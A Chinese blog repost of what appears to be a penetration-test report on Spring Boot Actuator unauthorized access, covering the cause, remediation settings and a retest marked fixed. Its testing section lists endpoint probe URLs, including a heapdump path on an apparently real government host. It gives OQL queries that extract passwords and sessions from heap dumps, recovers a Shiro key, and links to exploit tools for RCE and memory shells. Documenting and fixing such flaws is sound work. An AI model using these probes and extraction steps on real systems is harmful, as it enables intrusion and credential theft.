vlambda博客
学习文章列表

【禁止转载】Spring Boot Actuator未授权访问漏洞

12.Spring Boot Actuator未授权访问漏洞

漏洞名称

Spring Boot Actuator未授权访问漏洞

漏洞地址

https://www.jianshu.com/p/3162ce30a853

漏洞等级

高危

漏洞描述

Actuator是Spring Boot提供的服务监控和管理中间件,默认配置会出现接口未授权访问,部分接口会泄露网站流量信息和内存信息等,使用Jolokia库特性甚至可以远程执行任意代码,获取服务器权限。

漏洞成因

Spring Boot Framework包含许多称为执行器的功能,可帮助您在将Web应用程序投入生产时监视和管理Web应用程序。它们旨在用于审计,运行状况和指标收集,它们还可能在配置错误时打开服务器的隐藏门。

当Spring Boot应用程序运行时,它会自动将多个端点(例如'/health','/trace','/beans','/env'等)注册到路由进程中。对于Spring Boot 1 - 1.4,它们无需身份验证即可访问,从而导致严重的安全问题。从Spring 1.5版开始,默认情况下,除“/health”和“/info`”之外的所有端点都被视为敏感和安全,但应用程序开发人员通常会禁用此安全性。

以下Actuator端点可能具有安全隐患,从而导致可能的漏洞:

/auditevents - 显示应用暴露的审计事件 (比如认证进入、订单失败)/autoconfig - 提供了一份自动配置报告,记录了哪些自动配置条件通过,哪些没通过/beans - 显示应用程序中所有 Spring bean 的完整列表。/conditions - 显示自动配置报告,报告中包含所有自动配置候选项以及应用或不应用这些候选项的原因。/configprops - 显示所有 @ConfigurationProperties 的整理列表。/dump - 执行线程转储。/env - 公开 Spring ConfigurableEnvironment 中的属性。/health - 显示应用程序的运行状况信息(通过未经验证的连接访问时显示简单的状态信息,或通过身份验证时显示完整的消息详细信息)。/heapdump - 堆存储/info - 显示任意应用程序信息。/logfile - 输出日志文件的内容/loggers - 显示和修改配置的loggers/mappings - 显示所有 @RequestMapping 路径的整理列表。/metrics - 显示当前应用程序的指标信息。/restart - 重新启动应用程序/shutdown - 允许应用程序正常关机(默认不启用),要求endpoints.shutdown.enabled设置为true/trace - 显示跟踪信息(默认为上次的一些 HTTP 请求)。

对于Spring 1x,它们在根URL下注册,并且在2x中它们移动到“/actuator/”基本路径。

/actuator
/actuator/auditevents
/actuator/beans
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/health
/actuator/heapdump
/actuator/httptrace
/actuator/hystrix.stream
/actuator/info
/actuator/jolokia
/actuator/loggers
/actuator/mappings
/actuator/metrics
/actuator/scheduledtasks
/actuator/threaddump
/auditevents
/autoconfig
/beans
/cloudfoundryapplication
/configprops
/dump
/env
/health
/heapdump
/hystrix.stream
/info
/jolokia
/loggers
/mappings
/metrics
/monitor
/monitor/auditevents
/monitor/beans
/monitor/conditions
/monitor/configprops
/monitor/env
/monitor/health
/monitor/heapdump
/monitor/httptrace
/monitor/hystrix.stream
/monitor/info
/monitor/jolokia
/monitor/loggers
/monitor/mappings
/monitor/metrics
/monitor/scheduledtasks
/monitor/threaddump
/threaddump
/tracev

漏洞危害

修复方案

1.禁用所有接口,将配置改成:endpoints.enabled=false。要禁用trace端点,则可设置如下:endpoints.trace.enabled=false如果只想打开一两个接口,那就先禁用全部接口,然后启用需要的接口:endpoints.enabled=false
endpoints.metrics.trace=true
将内置端点trace进行授权配置为true,保证访问内置端点trace是经过授权的。logging.level.org.springframework=INFO
logging.level.org.springframework.boot.devtools=WARN
logging.level.org.owasp=DEBUG
logging.level.org.owasp.webwolf=TRACE

endpoints.trace.sensitive=true
2.Spring Boot 也提供了安全限制功能。比如spring-boot-starter-security依赖并自定义配置。引入spring-boot-starter-security依赖:<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-security</artifactId>
</dependency>
3.开启security功能,配置访问权限验证:management.port=8099
management.security.enabled=true
security.user.name=xxxxx
security.user.password=xxxxxx

测试过程

Spring Boot Actuator v2

http://isso.isso.isso:2800/manage

http://isso.isso.isso:2800/manage
http://isso.isso.isso:2800/manage/archaius
http://isso.isso.isso:2800/manage/nacos-discovery
http://isso.isso.isso:2800/manage/auditevents
http://isso.isso.isso:2800/manage/beans
http://isso.isso.isso:2800/manage/caches
http://isso.isso.isso:2800/manage/caches/{cache}
http://isso.isso.isso:2800/manage/health
http://isso.isso.isso:2800/manage/health/{component}
http://isso.isso.isso:2800/manage/health/{component}/{instance}
http://isso.isso.isso:2800/manage/conditions
http://isso.isso.isso:2800/manage/configprops
http://isso.isso.isso:2800/manage/env/{toMatch}
http://isso.isso.isso:2800/manage/env
http://isso.isso.isso:2800/manage/info
http://isso.isso.isso:2800/manage/logfile
http://isso.isso.isso:2800/manage/loggers
http://isso.isso.isso:2800/manage/loggers/{name}
http://isso.isso.isso:2800/manage/heapdump
http://isso.isso.isso:2800/manage/threaddump
http://isso.isso.isso:2800/manage/metrics
http://isso.isso.isso:2800/manage/metrics/{requiredMetricName}
http://isso.isso.isso:2800/manage/scheduledtasks
http://isso.isso.isso:2800/manage/httptrace
http://isso.isso.isso:2800/manage/mappings
http://isso.isso.isso:2800/manage/refresh
http://isso.isso.isso:2800/manage/features
http://isso.isso.isso:2800/manage/service-registry
/beans - 显示应用程序中所有 Spring bean 的完整列表。
/conditions - 显示自动配置报告,报告中包含所有自动配置候选项以及应用或不应用这些候选项的原因。
/configprops - 显示所有 @ConfigurationProperties 的整理列表。
/dump - 执行线程转储。
/env - 公开 Spring ConfigurableEnvironment 中的属性。
/health - 显示应用程序的运行状况信息(通过未经验证的连接访问时显示简单的状态信息,或通过身份验证时显示完整的消息详细信息)。
/info - 显示任意应用程序信息。
/mappings - 显示所有 @RequestMapping 路径的整理列表。
/metrics - 显示当前应用程序的指标信息。
/shutdown - 允许应用程序正常关机(默认不启用)。
/trace - 显示跟踪信息(默认为上次的一些 HTTP 请求)。
http://isso.isso.isso:2800/manage/heapdump
http://isso.isso.isso:2800/manage/httptrace
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
http://zfmh.mem.gov.cn:9000/heapdump
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))

SpringBootExploit

https://github.com/0x727

https://github.com/0x727/SpringBootExploit

https://github.com/0x727/SpringBootExploit/archive/refs/heads/main.zip

https://ghproxy.com/https://github.com/0x727/SpringBootExploit/archive/refs/heads/main.zip

https://github.com/0x727/SpringBootExploit/releases

https://github.com/0x727/SpringBootExploit/releases/tag/1.3

更新1.3版本,支持SpringCloudGatewayRCE CVE-2022-22947
目前仅仅支持小马,NettyMemshell和SpringRequestMappingMemshell 参考 文章https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/

https://github.com/0x727/SpringBootExploit/releases/download/1.3/SpringBootExploit-1.3-SNAPSHOT-all.jar

https://ghproxy.com/https://github.com/0x727/SpringBootExploit/releases/download/1.3/SpringBootExploit-1.3-SNAPSHOT-all.jar

https://github.com/0x727/SpringBootExploit/archive/refs/tags/1.3.zip

https://ghproxy.com/https://github.com/0x727/SpringBootExploit/archive/refs/tags/1.3.zip

Spring Boot Vulnerability Exploit Check List

https://github.com/LandGrey

https://github.com/LandGrey/SpringBootVulExploit

https://github.com/LandGrey/SpringBootVulExploit/archive/refs/heads/master.zip

https://ghproxy.com/https://github.com/LandGrey/SpringBootVulExploit/archive/refs/heads/master.zip

JVM堆内存分析工具-Memory Analyzer (MAT)

Memory Analyzer (MAT) 是Eclipse公司生产的Java堆内存分析器,MAT通过对堆内存的分析,可以帮助开发者查找内存泄漏减少内存消耗

Memory Analyzer (MAT)可以作为Eclipse的插件独立的应用进行安装,它的官网是:

https://www.eclipse.org/mat/

Memory Analyzer (MAT) 1.12.0

https://www.eclipse.org/mat/downloads.php

https://mirror.kakao.com/eclipse/mat/1.12.0/rcp/MemoryAnalyzer-1.12.0.20210602-win32.win32.x86_64.zip
https://mirror.kakao.com/eclipse/mat/1.12.0/rcp/MemoryAnalyzer-1.12.0.20210602-macosx.cocoa.x86_64.dmg
image-20211230114458533
org.apache.shiro.web.mgt.CookieRememberMeManager
base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb'95,73,100,-75,97,-84,-16,32,85,6,-80,77,-88,119,63,19))

VisualVM

https://visualvm.github.io/

https://visualvm.github.io/download.html

https://github.com/oracle/visualvm/releases/download/2.1.1/visualvm_211.zip

https://github.com/oracle/visualvm/releases/download/2.1.1/VisualVM_211.dmg
org.apache.shiro.web.mgt.CookieRememberMeManager
image-20220101204236508
base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb'95,73,100,-75,97,-84,-16,32,85,6,-80,77,-88,119,63,19))
image-20220101204529493
X0lktWGs8CBVBrBNqHc/Ew==

heapdump查询操作

Spring Boot Actuator未授权访问发现/env中有数据库连接配置信息,但是密码都是*号,这时可以尝试是否可以下载heapdump,在内存信息中找到对应的密码。

获取配置信息:

select * from org.springframework.web.context.support.StandardServletEnvironment

通过字符串匹配查找用户session:

select * from java.lang.String s WHERE toString(s) LIKE ".SESSION."

JDumpSpider[1]

https://github.com/whwlsfb/JDumpSpider

https://github.com/whwlsfb/JDumpSpider/releases

https://github.com/whwlsfb/JDumpSpider/releases/tag/dev-20220414T015801

https://github.com/whwlsfb/JDumpSpider/releases/download/dev-20220414T015801/JDumpSpider-1.0-SNAPSHOT-full.jar

复测情况

已修复

测试人员

南风向晚

引用链接

[1] JDumpSpider: https://github.com/whwlsfb/JDumpSpider